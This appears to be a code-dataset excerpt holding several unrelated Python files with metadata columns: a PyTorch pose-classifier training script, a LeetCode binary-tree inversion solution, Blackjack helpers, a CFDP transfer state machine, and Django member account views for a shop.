model.load_state_dict(torch.load(ckpt_fn))
print("Transfer Learning")
else:
print("Not Transfer Learning")
loader = DataLoader(args.num_frames, use_arm, m_score)
inp1, out1 = loader.load_all()
x_train, x_test, y_train, y_test = ms.train_test_split(
inp1, out1, test_size=0.15, random_state=23)
x_train = pr.normalize(x_train)
y_train = pr.normalize(y_train)
x_test = pr.normalize(x_test)
y_test = pr.normalize(y_test)
train_iters(model, x_train, y_train, x_test, y_test, fn)
torch.save(model.state_dict(), fn) | 34.494253 | 232 | 0.721315 | # Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
''' Imports '''
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim.lr_scheduler import StepLR
import argparse
import random
import numpy as np
import time
from tqdm import tqdm
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import operator
import os
import sys
import signal
from Var import Var
from DataLoader import DataLoader
import sklearn.model_selection as ms
import sklearn.preprocessing as pr
plt.switch_backend('agg')
use_cuda = torch.cuda.is_available()
v = Var()
num_classes = v.get_num_classes()
popnn_vars = v.get_POPNN()
class Model(nn.Module):
''' FC Neural Network '''
def __init__(self, input_size, num_features, dropout=0):
super(Model, self).__init__()
self.input_size = input_size
self.dropout = dropout
self.num_features = num_features # using x and y is 2 features, only dist is 1, etc.
self.hidden1 = popnn_vars["hidden1"]
self.hidden2 = popnn_vars["hidden2"]
self.hidden3 = popnn_vars["hidden3"]
self.hidden4 = popnn_vars["hidden4"]
self.fc1 = nn.Linear(self.num_features * self.input_size, self.hidden1)
self.drop = nn.Dropout(p=dropout)
self.fc2 = nn.Linear(self.hidden1, self.hidden2)
self.fc3 = nn.Linear(self.hidden2, self.hidden3)
self.fc4 = nn.Linear(self.hidden3, self.hidden4)
def forward(self, input):
''' Forward pass through network '''
output = input.view(-1, self.num_features * self.input_size)
output = self.drop(F.relu(self.fc1(output)))
output = self.drop(F.relu(self.fc2(output)))
output = self.drop(F.relu(self.fc3(output)))
output = self.drop(F.relu(self.fc4(output)))
output = F.logsigmoid(output)
return output
def accuracy(output, label):
''' Check if network output is equal to the corresponding label '''
max_idx, val = max(enumerate(output[0]), key=operator.itemgetter(1))
out = torch.zeros(1, num_classes).cuda() if use_cuda else torch.zeros(1, num_classes)
out[0][max_idx] = 1
if torch.eq(out.float(), label).byte().all():
return 1
else:
return 0
def train(model, optim, criterion, datum, label):
''' Modify weights based off cost from one datapoint '''
optim.zero_grad()
output = model(datum)
output = output.view(1, num_classes)
is_correct = accuracy(output, label)
loss = criterion(output, label)
loss.backward()
optim.step()
return loss.item(), is_correct
def test_accuracy(model, x_test, y_test):
''' Accuracy of Model on test data '''
num_correct = 0
for test, label in zip(x_test, y_test):
output = model(test.view(1, model.num_features, model.input_size))
is_correct = accuracy(output, label)
num_correct += is_correct
return num_correct / float(x_test.size()[0])
def create_plot(loss, train_acc, test_acc, num_epochs, plot_every, fn):
''' Creates graph of loss, training accuracy, and test accuracy '''
plt.figure()
fig, ax = plt.subplots()
x_ticks = range(plot_every, num_epochs + 1, plot_every)
y_ticks = np.arange(0, 1.1, 0.1)
plt.subplot(111)
plt.plot(x_ticks, loss, label="Average Loss")
plt.plot(x_ticks, train_acc, label="Training Accuracy")
plt.plot(x_ticks, test_acc, label="Validation Accuracy")
plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,
ncol=2, mode="expand", borderaxespad=0.)
plt.xticks(x_ticks)
plt.yticks(y_ticks)
plt.axis([0, num_epochs, 0, 1])
plt.ylabel("Average Loss")
plt.xlabel("Epoch")
''' Save graph '''
plt.savefig(fn)
def train_iters(model, x_train, y_train, x_test, y_test, fn, lr=popnn_vars['lr'], batch_size=popnn_vars["batch_size"], num_epochs=popnn_vars["num_epochs"], print_every=popnn_vars['print_every'], plot_every=popnn_vars['plot_every']):
''' Trains neural net for numEpochs iters '''
num = fn.split('/')[-1].split('.')[0].split('popnn')[-1]
plot_fn = "graphs/popnn/lossAvg%s.png" % num
def sigint_handler(sig, iteration):
''' Handles Ctrl + C. Save the data into npz files. Data inputted into thenetwork '''
torch.save(model.state_dict(), fn)
create_plot(plot_loss_avgs, train_accuracies,
test_accuracies, num_epochs, plot_every, plot_fn)
print("Saving model and Exiting")
sys.exit(0)
''' Initialize sigint handler '''
signal.signal(signal.SIGINT, sigint_handler)
plot_loss_avgs = []
epochs = []
train_accuracies = []
test_accuracies = []
loss_total = 0
plot_loss_total = 0
num_correct = 0
plot_correct = 0
optimizer = optim.Adam(model.parameters(), lr=lr)
if gamma != None:
scheduler = StepLR(optimizer, step_size=300, gamma=gamma)
criterion = nn.BCEWithLogitsLoss()
y_train = torch.from_numpy(y_train).float().cuda(
) if use_cuda else torch.from_numpy(y_train).float()
x_train = torch.from_numpy(x_train).float().cuda(
) if use_cuda else torch.from_numpy(x_train).float()
y_test = torch.from_numpy(y_test).float().cuda(
) if use_cuda else torch.from_numpy(y_test).float()
x_test = torch.from_numpy(x_test).float().cuda(
) if use_cuda else torch.from_numpy(x_test).float()
for current_epoch in tqdm(range(num_epochs)):
if gamma != None:
scheduler.step()
for i in range(batch_size):
frame_num = random.randint(0, x_train.size()[0] - 1)
frame = x_train[frame_num].view(1, model.num_features, model.input_size)
label = y_train[frame_num].view(1, num_classes)
loss, is_correct = train(
model, optimizer, criterion, frame, label)
num_correct += is_correct
loss_total += loss
plot_correct += is_correct # Make a copy of numCorrect for plot_every
plot_loss_total += loss
if (current_epoch + 1) % print_every == 0:
avg_loss = loss_total / (print_every * batch_size)
train_acc = num_correct / float(print_every * batch_size)
test_acc = test_accuracy(model, x_test, y_test)
tqdm.write("[Epoch %d/%d] Avg Loss: %f, Training Acc: %f, Validation Acc: %f" %
(current_epoch + 1, num_epochs, avg_loss, train_acc, test_acc))
loss_total = 0
num_correct = 0
if (current_epoch + 1) % plot_every == 0:
plot_test_acc = test_accuracy(model, x_test, y_test)
plot_train_acc = plot_correct / float(plot_every * batch_size)
train_accuracies.append(plot_train_acc)
test_accuracies.append(plot_test_acc)
avg_loss = plot_loss_total / (plot_every * batch_size)
plot_loss_avgs.append(avg_loss)
epochs.append(current_epoch + 1)
plot_correct = 0
plot_loss_total = 0
create_plot(plot_loss_avgs, train_accuracies,
test_accuracies, num_epochs, plot_every, plot_fn)
if __name__ == "__main__":
''' Argparse Flags '''
parser = argparse.ArgumentParser(description='Fully Connected Feed Forward Net on tf-openpose data')
parser.add_argument("--transfer", "-t", dest="transfer", action="store_true")
parser.add_argument('--debug', dest='debug', action='store_true')
parser.add_argument("--ckpt-fn", "-c", dest="ckpt_fn",
type=str, default="popnn000.ckpt")
parser.add_argument("--save-fn", "-s", dest="save_fn",
type=str, default="popnn000.ckpt")
parser.add_argument("--learning-rate", "-lr",
dest="learning_rate", type=float, default=0.000035)
parser.add_argument("--num-epochs", "-e", dest="num_epochs",
type=int, default=1000, help='number of training iterations')
parser.add_argument("--batch-size", "-b", dest="batch_size", type=int,
default=256, help='number of training samples per epoch')
parser.add_argument('--num-frames', '-f', dest='num_frames', type=int, default=4,
help='number of consecutive frames where distances are accumulated')
parser.add_argument('--lr-decay-rate', '-d', dest='gamma', type=float, default=None)
parser.add_argument('--only-arm', '-o', dest='use_arm', action='store_true',
help="only use arm data")
parser.add_argument('--multiply-by-score', '-m', dest='m_score', action='store_true')
''' Set argparse defaults '''
parser.set_defaults(use_arm=False)
parser.set_defaults(transfer=False)
parser.set_defaults(debug=False)
parser.set_defaults(m_score=False)
''' Set variables to argparse arguments '''
args = parser.parse_args()
transfer = args.transfer
debug = args.debug
gamma = args.gamma
use_arm = args.use_arm
m_score = m_score
ckpt_fn = "lstmpts/popnn/%s" % args.ckpt_fn
fn = "lstmpts/popnn/%s" % args.save_fn
v = Var(use_arm)
input_size = v.get_size()
num_features = v.get_num_features()
dropout = popnn_vars['dropout']
model = Model(input_size=input_size, num_features=num_features, dropout=dropout)
model = model.cuda() if use_cuda else model
if transfer:
model.load_state_dict(torch.load(ckpt_fn))
print("Transfer Learning")
else:
print("Not Transfer Learning")
loader = DataLoader(args.num_frames, use_arm, m_score)
inp1, out1 = loader.load_all()
x_train, x_test, y_train, y_test = ms.train_test_split(
inp1, out1, test_size=0.15, random_state=23)
x_train = pr.normalize(x_train)
y_train = pr.normalize(y_train)
x_test = pr.normalize(x_test)
y_test = pr.normalize(y_test)
train_iters(model, x_train, y_train, x_test, y_test, fn)
torch.save(model.state_dict(), fn) | 631 | 0 | 24 |
f167c13fb9a6fa79b72ac03dc561d070112c7b79 | 1,214 | py | Python | 226.invert-binary-tree.py | windard/leeeeee | 0107a5f95746592ca4fe78d2b5875cf65b1910e7 | [
"MIT"
] | null | null | null | 226.invert-binary-tree.py | windard/leeeeee | 0107a5f95746592ca4fe78d2b5875cf65b1910e7 | [
"MIT"
] | null | null | null | 226.invert-binary-tree.py | windard/leeeeee | 0107a5f95746592ca4fe78d2b5875cf65b1910e7 | [
"MIT"
] | null | null | null | #
# @lc app=leetcode id=226 lang=python
#
# [226] Invert Binary Tree
#
# https://leetcode.com/problems/invert-binary-tree/description/
#
# algorithms
# Easy (56.72%)
# Total Accepted: 297.1K
# Total Submissions: 522.5K
# Testcase Example: '[4,2,7,1,3,6,9]'
#
# Invert a binary tree.
#
# Example:
#
# Input:
#
#
# 4
# / \
# 2 7
# / \ / \
# 1 3 6 9
#
# Output:
#
#
# 4
# / \
# 7 2
# / \ / \
# 9 6 3 1
#
# Trivia:
# This problem was inspired by this original tweet by Max Howell:
#
# Google: 90% of our engineers use the software you wrote (Homebrew), but you
# can’t invert a binary tree on a whiteboard so f*** off.
#
#
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
| 18.393939 | 77 | 0.553542 | #
# @lc app=leetcode id=226 lang=python
#
# [226] Invert Binary Tree
#
# https://leetcode.com/problems/invert-binary-tree/description/
#
# algorithms
# Easy (56.72%)
# Total Accepted: 297.1K
# Total Submissions: 522.5K
# Testcase Example: '[4,2,7,1,3,6,9]'
#
# Invert a binary tree.
#
# Example:
#
# Input:
#
#
# 4
# / \
# 2 7
# / \ / \
# 1 3 6 9
#
# Output:
#
#
# 4
# / \
# 7 2
# / \ / \
# 9 6 3 1
#
# Trivia:
# This problem was inspired by this original tweet by Max Howell:
#
# Google: 90% of our engineers use the software you wrote (Homebrew), but you
# can’t invert a binary tree on a whiteboard so f*** off.
#
#
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def invertTree(self, root):
"""
:type root: TreeNode
:rtype: TreeNode
"""
if not root:
return
root.left, root.right = root.right, root.left
if root.left:
self.invertTree(root.left)
if root.right:
self.invertTree(root.right)
return root
| 0 | 351 | 23 |
ea3a96f8d11422a1ee7342ce72973227c97bad62 | 476 | py | Python | Blackjack/functions.py | Peter380/Python | 03b6cfda249cd538711d6a047a2e852dc91f84c5 | [
"MIT"
] | null | null | null | Blackjack/functions.py | Peter380/Python | 03b6cfda249cd538711d6a047a2e852dc91f84c5 | [
"MIT"
] | null | null | null | Blackjack/functions.py | Peter380/Python | 03b6cfda249cd538711d6a047a2e852dc91f84c5 | [
"MIT"
] | null | null | null | import os
#Functions for Blackjack
| 22.666667 | 82 | 0.596639 | import os
#Functions for Blackjack
def display_players_cards(Player):
for card in Player.hand:
print(card)
def get_players_bet():
valid_input = False
while valid_input == False:
try:
bet = int(input("How much are you betting? Please insert a number: "))
valid_input = True
except:
print("This is not a number. Please insert a number")
return bet
def clear():
os.system('cls')
| 360 | 0 | 76 |
22c5a1b7e06dc39bf91f470930269579fc50fe4b | 9,524 | py | Python | ait/dsn/cfdp/machines/machine.py | kmarwah/AIT-DSN | 338614dfef6713431f79d6daaffc0e4303be0ced | [
"MIT"
] | 12 | 2019-01-30T17:43:51.000Z | 2022-02-23T03:36:57.000Z | ait/dsn/cfdp/machines/machine.py | kmarwah/AIT-DSN | 338614dfef6713431f79d6daaffc0e4303be0ced | [
"MIT"
] | 117 | 2018-04-16T16:11:48.000Z | 2022-03-31T18:21:24.000Z | ait/dsn/cfdp/machines/machine.py | kmarwah/AIT-DSN | 338614dfef6713431f79d6daaffc0e4303be0ced | [
"MIT"
] | 12 | 2018-08-30T15:52:56.000Z | 2022-01-12T19:52:04.000Z | # Advanced Multi-Mission Operations System (AMMOS) Instrument Toolkit (AIT)
# Bespoke Link to Instruments and Small Satellites (BLISS)
#
# Copyright 2018, by the California Institute of Technology. ALL RIGHTS
# RESERVED. United States Government Sponsorship acknowledged. Any
# commercial use must be negotiated with the Office of Technology Transfer
# at the California Institute of Technology.
#
# This software may be subject to U.S. export control laws. By accepting
# this software, the user agrees to comply with all applicable U.S. export
# laws and regulations. User has the responsibility to obtain export licenses,
# or other export authority as may be required before exporting such
# information to foreign countries or providing access to foreign persons.
from ait.dsn.cfdp.primitives import Role, MachineState, FinalStatus, IndicationType, HandlerCode, ConditionCode
from ait.dsn.cfdp.events import Event
import ait.core.log
class ID(object):
"""
CFDP entity ID. Unsigned binary integer
Entity ID length is 3 bits, value can be up to 8 octets (bytes) long
Entity ID is packed in PDUs by octet length less 1 (e.g. 0 for 1 octet length)
"""
# TODO figure out 3 bit length, 8 byte value restriction
@property
@length.setter
@property
@value.setter
| 36.212928 | 114 | 0.653507 | # Advanced Multi-Mission Operations System (AMMOS) Instrument Toolkit (AIT)
# Bespoke Link to Instruments and Small Satellites (BLISS)
#
# Copyright 2018, by the California Institute of Technology. ALL RIGHTS
# RESERVED. United States Government Sponsorship acknowledged. Any
# commercial use must be negotiated with the Office of Technology Transfer
# at the California Institute of Technology.
#
# This software may be subject to U.S. export control laws. By accepting
# this software, the user agrees to comply with all applicable U.S. export
# laws and regulations. User has the responsibility to obtain export licenses,
# or other export authority as may be required before exporting such
# information to foreign countries or providing access to foreign persons.
from ait.dsn.cfdp.primitives import Role, MachineState, FinalStatus, IndicationType, HandlerCode, ConditionCode
from ait.dsn.cfdp.events import Event
import ait.core.log
class ID(object):
"""
CFDP entity ID. Unsigned binary integer
Entity ID length is 3 bits, value can be up to 8 octets (bytes) long
Entity ID is packed in PDUs by octet length less 1 (e.g. 0 for 1 octet length)
"""
# TODO figure out 3 bit length, 8 byte value restriction
def __init__(self, length, value):
# store raw value
self._length = length
self._value = value
@property
def length(self):
return self._length
@length.setter
def length(self, l):
if not l:
raise ValueError('length cannot be empty')
if l > 8:
raise ValueError('id length cannot exceed 8 bytes')
self._length = l
@property
def value(self):
return self._value
@value.setter
def value(self, v):
if not v:
raise ValueError('value cannot be empty')
self._value = v
class Transaction(object):
def __init__(self, entity_id, transaction_id):
# Unique identifier for a transaction, the concatentation of entity id and the transaction sequence number
self.entity_id = entity_id
self.transaction_id = transaction_id
# Other Tx properties
self.abandoned = False
self.cancelled = False
self.condition_code = None # condition code under which Tx was finished
self.delivery_code = None # can be Data Complete or Data Incomplete
self.filedata_offset = None # offset for last touched file data (either sent or received)
self.filedata_length = None # last length of above
self.filedata_checksum = 0
self.final_status = None
self.finished = False
self.frozen = False
self.is_metadata_received = False
self.metadata = None
self.other_entity_id = None # entity ID of other end of Tx
self.start_time = None
self.suspended = False
self.full_file_path = None
self.recv_file_size = 0
self.file_checksum = None
class Machine(object):
role = Role.UNDEFINED
# state descriptors for the machine. override with appropriate descriptions in subclasses
S1 = MachineState.SEND_METADATA
S2 = MachineState.SEND_FILEDATA
def __init__(self, cfdp, transaction_id, *args, **kwargs):
self.kernel = cfdp
self.transaction = Transaction(cfdp.mib.local_entity_id, transaction_id)
self.state = self.S1
# Set up fault and indication handlers
self.indication_handler = kwargs.get('indication_handler', self._indication_handler)
# Open file being sent or received (final file, not temp)
self.file = None
# Path of source or destination file (depending on role)
self.file_path = None
# Open temp file for receiving file data
self.temp_file = None
self.temp_path = None
# header is re-used to make each PDU because values will mostly be the same
self.header = None
self.metadata = None
self.eof = None
# State machine flags
self.pdu_received = False
self.put_request_received = False
self.eof_received = False
self.eof_sent = False
self.machine_finished = False
self.initiated_cancel = False
self.is_ack_outgoing = False
self.is_oef_outgoing = False
self.is_fin_outgoing = False
self.is_md_outgoing = False
self.is_nak_outgoing = False
self.is_shutdown = False
self.inactivity_timer = None
self.ack_timer = None
self.nak_timer = None
def _indication_handler(self, indication_type, *args, **kwargs):
"""
Default indication handler, which is just to log a message
Indication type is primitive type `IndicationType`
"""
ait.core.log.info('INDICATION: ' + str(indication_type))
def fault_handler(self, condition_code, *args, **kwargs):
"""
Default fault handler, which is just to log a message
Fault type is primitive type `ConditionCode`
"""
ait.core.log.info('FAULT: ' + str(condition_code))
handler = self.kernel.mib.fault_handler(condition_code)
if handler == HandlerCode.IGNORE:
return True
elif handler == HandlerCode.CANCEL:
self.initiated_cancel = True
self.cancel()
if self.role == Role.CLASS_1_SENDER:
self.update_state(Event.NOTICE_OF_CANCELLATION)
elif self.role == Role.CLASS_1_RECEIVER:
self.finish_transaction()
elif handler == HandlerCode.ABANDON:
self.update_state(Event.ABANDON_TRANSACTION)
elif handler == HandlerCode.SUSPEND:
self.update_state(Event.NOTICE_OF_SUSPENSION)
def update_state(self, event=None, pdu=None, request=None):
"""
Evaluate a state change on received input
:param event:
:param pdu:
:param request:
:return:
"""
raise NotImplementedError
def abandon(self):
self.transaction.abandoned = True
self.transaction.finished = True
self.transaction.final_status = FinalStatus.FINAL_STATUS_ABANDONED
self.indication_handler(IndicationType.ABANDONED_INDICATION)
self.shutdown()
def suspend(self):
if not self.transaction.suspended:
self.transaction.suspended = True
if self.inactivity_timer:
self.inactivity_timer.pause()
if self.ack_timer:
self.ack_timer.pause()
if self.nak_timer:
self.nak_timer.pause()
self.indication_handler(IndicationType.SUSPENDED_INDICATION,
transaction_id=self.transaction.transaction_id,
condition_code=ConditionCode.SUSPEND_REQUEST_RECEIVED)
def cancel(self):
"""Cancel self"""
self.is_oef_outgoing = False
self.is_ack_outgoing = False
self.is_fin_outgoing = False
self.is_md_outgoing = False
self.is_nak_outgoing = False
self.transaction.cancelled = True
if self.inactivity_timer:
self.inactivity_timer.cancel()
if self.ack_timer:
self.ack_timer.cancel()
if self.nak_timer:
self.nak_timer.cancel()
def notify_partner_of_cancel(self):
"""Ask partner to cancel and then shutdown"""
self.is_oef_outgoing = True
self.transaction.cancelled = True
self.indication_handler(IndicationType.TRANSACTION_FINISHED_INDICATION,
transaction_id=self.transaction.transaction_id)
# Shutdown
self.shutdown()
def finish_transaction(self):
"""Closes out a transaction. Sends the appropriate Indication and resets instance variables"""
ait.core.log.info("Machine {} finishing transaction...".format(self.transaction.transaction_id))
self.is_oef_outgoing = False
self.is_ack_outgoing = False
self.is_fin_outgoing = False
self.is_md_outgoing = False
self.is_nak_outgoing = False
if self.inactivity_timer:
self.inactivity_timer.cancel()
if self.ack_timer:
self.ack_timer.cancel()
if self.nak_timer:
self.nak_timer.cancel()
self.transaction.finished = True
if self.role == Role.CLASS_1_RECEIVER and not self.transaction.is_metadata_received:
self.transaction.final_status = FinalStatus.FINAL_STATUS_NO_METADATA
elif self.transaction.cancelled:
self.transaction.final_status = FinalStatus.FINAL_STATUS_CANCELLED
else:
self.transaction.final_status = FinalStatus.FINAL_STATUS_SUCCESSFUL
self.indication_handler(IndicationType.TRANSACTION_FINISHED_INDICATION,
transaction_id=self.transaction.transaction_id)
def shutdown(self):
ait.core.log.info("Machine {} shutting down...".format(self.transaction.transaction_id))
if self.file is not None and not self.file.closed:
self.file.close()
self.file = None
if self.temp_file is not None and not self.temp_file.closed:
self.temp_file.close()
self.temp_file = None
# If transaction was unsuccesful, delete temp file
# TODO issue Tx indication (finished, abandoned, etc)
self.transaction.finish = True
self.is_shutdown = True
| 4,168 | 3,843 | 203 |
167538b2fcb361c4fd74d8a7824450a235f4128c | 27,895 | py | Python | member/views.py | pincoin/rakmai | d9daa399aff50712a86b2dec9d94e622237b25b0 | [
"MIT"
] | 11 | 2018-04-02T16:36:19.000Z | 2019-07-10T05:54:58.000Z | member/views.py | pincoin/rakmai | d9daa399aff50712a86b2dec9d94e622237b25b0 | [
"MIT"
] | 22 | 2019-01-01T20:40:21.000Z | 2022-02-10T08:06:39.000Z | member/views.py | pincoin/rakmai | d9daa399aff50712a86b2dec9d94e622237b25b0 | [
"MIT"
] | 4 | 2019-03-12T14:24:37.000Z | 2022-01-07T16:20:22.000Z | import json
import logging
import re
import uuid
from datetime import datetime
import requests
from allauth.account.models import EmailAddress
from allauth.account.views import (
LoginView, LogoutView, SignupView,
PasswordChangeView, PasswordSetView,
PasswordResetView, PasswordResetDoneView, PasswordResetFromKeyView, PasswordResetFromKeyDoneView,
EmailVerificationSentView, ConfirmEmailView, EmailView, AccountInactiveView
)
from allauth.socialaccount import views as socialaccount_views
from allauth.socialaccount.models import SocialAccount
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth import logout
from django.contrib.auth.mixins import (
AccessMixin, LoginRequiredMixin
)
from django.contrib.gis.geoip2 import GeoIP2
from django.shortcuts import (
get_object_or_404
)
from django.urls import reverse
from django.utils.timezone import (
timedelta, localtime, make_aware, now
)
from django.utils.translation import ugettext_lazy as _
from django.views.generic import (
TemplateView, UpdateView, DetailView, FormView
)
from geoip2.errors import AddressNotFoundError
from ipware import get_client_ip
from rest_framework import (
status, views
)
from rest_framework.response import Response
from rakmai.viewmixins import HostContextMixin
from shop.models import Order
from shop.tasks import (
send_notification_line
)
from shop.viewmixins import StoreContextMixin
from . import settings as member_settings
from .forms2 import (
MemberLoginForm, MemberResetPasswordForm, MemberResetPasswordKeyForm, MemberAddEmailForm,
MemberChangePasswordForm, MemberSetPasswordForm,
MemberDocumentForm, MemberUnregisterForm, MemberChangeNameForm,
)
from .models import (
Profile, PhoneVerificationLog, PhoneBanned
)
from .serializers import IamportSmsCallbackSerializer
| 42.915385 | 120 | 0.59197 | import json
import logging
import re
import uuid
from datetime import datetime
import requests
from allauth.account.models import EmailAddress
from allauth.account.views import (
LoginView, LogoutView, SignupView,
PasswordChangeView, PasswordSetView,
PasswordResetView, PasswordResetDoneView, PasswordResetFromKeyView, PasswordResetFromKeyDoneView,
EmailVerificationSentView, ConfirmEmailView, EmailView, AccountInactiveView
)
from allauth.socialaccount import views as socialaccount_views
from allauth.socialaccount.models import SocialAccount
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth import logout
from django.contrib.auth.mixins import (
AccessMixin, LoginRequiredMixin
)
from django.contrib.gis.geoip2 import GeoIP2
from django.shortcuts import (
get_object_or_404
)
from django.urls import reverse
from django.utils.timezone import (
timedelta, localtime, make_aware, now
)
from django.utils.translation import ugettext_lazy as _
from django.views.generic import (
TemplateView, UpdateView, DetailView, FormView
)
from geoip2.errors import AddressNotFoundError
from ipware import get_client_ip
from rest_framework import (
status, views
)
from rest_framework.response import Response
from rakmai.viewmixins import HostContextMixin
from shop.models import Order
from shop.tasks import (
send_notification_line
)
from shop.viewmixins import StoreContextMixin
from . import settings as member_settings
from .forms2 import (
MemberLoginForm, MemberResetPasswordForm, MemberResetPasswordKeyForm, MemberAddEmailForm,
MemberChangePasswordForm, MemberSetPasswordForm,
MemberDocumentForm, MemberUnregisterForm, MemberChangeNameForm,
)
from .models import (
Profile, PhoneVerificationLog, PhoneBanned
)
from .serializers import IamportSmsCallbackSerializer
class MemberLoginView(HostContextMixin, StoreContextMixin, LoginView):
template_name = 'member/account/login.html'
form_class = MemberLoginForm
def get_form_kwargs(self):
# Pass 'self.request' object to PostForm instance
kwargs = super(MemberLoginView, self).get_form_kwargs()
kwargs['recaptcha'] = False
if member_settings.GOOGLE_RECAPTCHA_SESSION_KEY in self.request.session:
kwargs['recaptcha'] = True
try:
ip_address = get_client_ip(self.request)[0]
if ip_address not in ['127.0.0.1']:
country = GeoIP2().country(ip_address)
if country['country_code'] and country['country_code'].upper() not in settings.WHITE_COUNTRY_CODES:
kwargs['recaptcha'] = True
except AddressNotFoundError:
pass
return kwargs
def form_valid(self, form):
if member_settings.GOOGLE_RECAPTCHA_SESSION_KEY in self.request.session:
del self.request.session[member_settings.GOOGLE_RECAPTCHA_SESSION_KEY]
return super(MemberLoginView, self).form_valid(form)
def form_invalid(self, form):
self.request.session[member_settings.GOOGLE_RECAPTCHA_SESSION_KEY] = True
self.request.session.modified = True
return super(MemberLoginView, self).form_invalid(form)
def get_context_data(self, **kwargs):
context = super(MemberLoginView, self).get_context_data(**kwargs)
context['page_title'] = _('Login')
context['google_recaptcha_site_key'] = settings.GOOGLE_RECAPTCHA['site_key']
return context
class MemberLogoutView(HostContextMixin, StoreContextMixin, LogoutView):
template_name = 'member/account/logout.html'
def get_context_data(self, **kwargs):
context = super(MemberLogoutView, self).get_context_data(**kwargs)
context['page_title'] = _('Logout')
return context
class MemberSignupView(HostContextMixin, StoreContextMixin, SignupView):
template_name = 'member/account/signup.html'
template_name_signup_closed = 'member/account/signup_closed.html'
def get_context_data(self, **kwargs):
context = super(MemberSignupView, self).get_context_data(**kwargs)
context['page_title'] = _('Sign up')
return context
class MemberPasswordReset(HostContextMixin, StoreContextMixin, PasswordResetView):
template_name = 'member/account/password_reset.html'
form_class = MemberResetPasswordForm
def get_context_data(self, **kwargs):
context = super(MemberPasswordReset, self).get_context_data(**kwargs)
context['page_title'] = _('Password Reset')
return context
class MemberPasswordResetDoneView(HostContextMixin, StoreContextMixin, PasswordResetDoneView):
template_name = 'member/account/password_reset_done.html'
def get_context_data(self, **kwargs):
context = super(MemberPasswordResetDoneView, self).get_context_data(**kwargs)
context['page_title'] = _('Password Reset Done')
return context
class MemberPasswordResetFromKeyView(HostContextMixin, StoreContextMixin, PasswordResetFromKeyView):
template_name = 'member/account/password_reset_from_key.html'
form_class = MemberResetPasswordKeyForm
def get_context_data(self, **kwargs):
context = super(MemberPasswordResetFromKeyView, self).get_context_data(**kwargs)
context['page_title'] = _('Password Reset')
return context
class MemberPasswordResetFromKeyDoneView(HostContextMixin, StoreContextMixin, PasswordResetFromKeyDoneView):
template_name = 'member/account/password_reset_from_key_done.html'
def get_context_data(self, **kwargs):
context = super(MemberPasswordResetFromKeyDoneView, self).get_context_data(**kwargs)
context['page_title'] = _('Password Reset Done')
return context
class MemberEmailVerificationSentView(HostContextMixin, StoreContextMixin, EmailVerificationSentView):
template_name = 'member/account/verification_sent.html'
def get_context_data(self, **kwargs):
context = super(MemberEmailVerificationSentView, self).get_context_data(**kwargs)
context['page_title'] = _('Email Verification Sent')
return context
class MemberConfirmEmailView(HostContextMixin, StoreContextMixin, ConfirmEmailView):
template_name = 'member/account/email_confirm.html'
def get_context_data(self, **kwargs):
context = super(MemberConfirmEmailView, self).get_context_data(**kwargs)
context['page_title'] = _('Confirm Email Request')
return context
class MemberEmailView(HostContextMixin, StoreContextMixin, LoginRequiredMixin, EmailView):
template_name = 'member/account/email.html'
form_class = MemberAddEmailForm
def get_context_data(self, **kwargs):
context = super(MemberEmailView, self).get_context_data(**kwargs)
context['page_title'] = _('Email Management')
return context
class MemberAccountInactiveView(HostContextMixin, StoreContextMixin, AccountInactiveView):
template_name = 'member/account/account_inactive.html'
def get_context_data(self, **kwargs):
context = super(MemberAccountInactiveView, self).get_context_data(**kwargs)
context['page_title'] = _('Account Inactive')
return context
class MemberPasswordChangeView(HostContextMixin, StoreContextMixin, LoginRequiredMixin, PasswordChangeView):
template_name = 'member/account/password_change.html'
form_class = MemberChangePasswordForm
def get_context_data(self, **kwargs):
context = super(MemberPasswordChangeView, self).get_context_data(**kwargs)
context['page_title'] = _('Password Change')
return context
class MemberPasswordSetView(HostContextMixin, StoreContextMixin, LoginRequiredMixin, PasswordSetView):
template_name = 'member/account/password_set.html'
form_class = MemberSetPasswordForm
def get_context_data(self, **kwargs):
context = super(MemberPasswordSetView, self).get_context_data(**kwargs)
context['page_title'] = _('Password Set')
return context
class MemberSocialLoginCancelledView(HostContextMixin, StoreContextMixin, socialaccount_views.LoginCancelledView):
template_name = 'member/socialaccount/login_cancelled.html'
def get_context_data(self, **kwargs):
context = super(MemberSocialLoginCancelledView, self).get_context_data(**kwargs)
context['page_title'] = _('Login Cancelled')
return context
class MemberSocialLoginErrorView(HostContextMixin, StoreContextMixin, socialaccount_views.LoginErrorView):
template_name = 'member/socialaccount/authentication_error.html'
def get_context_data(self, **kwargs):
context = super(MemberSocialLoginErrorView, self).get_context_data(**kwargs)
context['page_title'] = _('Social Network Login Failure')
return context
class MemberSocialSignupView(HostContextMixin, StoreContextMixin, socialaccount_views.SignupView):
template_name = 'member/socialaccount/signup.html'
def get_context_data(self, **kwargs):
context = super(MemberSocialSignupView, self).get_context_data(**kwargs)
context['page_title'] = _('Sign up')
return context
class MemberSocialConnectionsView(HostContextMixin, StoreContextMixin, LoginRequiredMixin,
socialaccount_views.ConnectionsView):
template_name = 'member/socialaccount/connections.html'
def get_context_data(self, **kwargs):
context = super(MemberSocialConnectionsView, self).get_context_data(**kwargs)
context['page_title'] = _('Connect with SNS accounts')
return context
class TermsView(HostContextMixin, StoreContextMixin, TemplateView):
template_name = 'member/account/terms.html'
def get_context_data(self, **kwargs):
context = super(TermsView, self).get_context_data(**kwargs)
context['page_title'] = _('Terms and Conditions')
return context
class PrivacyView(HostContextMixin, StoreContextMixin, TemplateView):
template_name = 'member/account/privacy.html'
def get_context_data(self, **kwargs):
context = super(PrivacyView, self).get_context_data(**kwargs)
context['page_title'] = _('Privacy Policy')
return context
class MemberProfileView(LoginRequiredMixin, HostContextMixin, StoreContextMixin, DetailView):
template_name = 'member/account/profile.html'
context_object_name = 'member'
def get_object(self, queryset=None):
# NOTE: This method is overridden because DetailView must be called with either an object pk or a slug.
queryset = Profile.objects \
.select_related('user')
return get_object_or_404(queryset, user__pk=self.request.user.id)
def get_context_data(self, **kwargs):
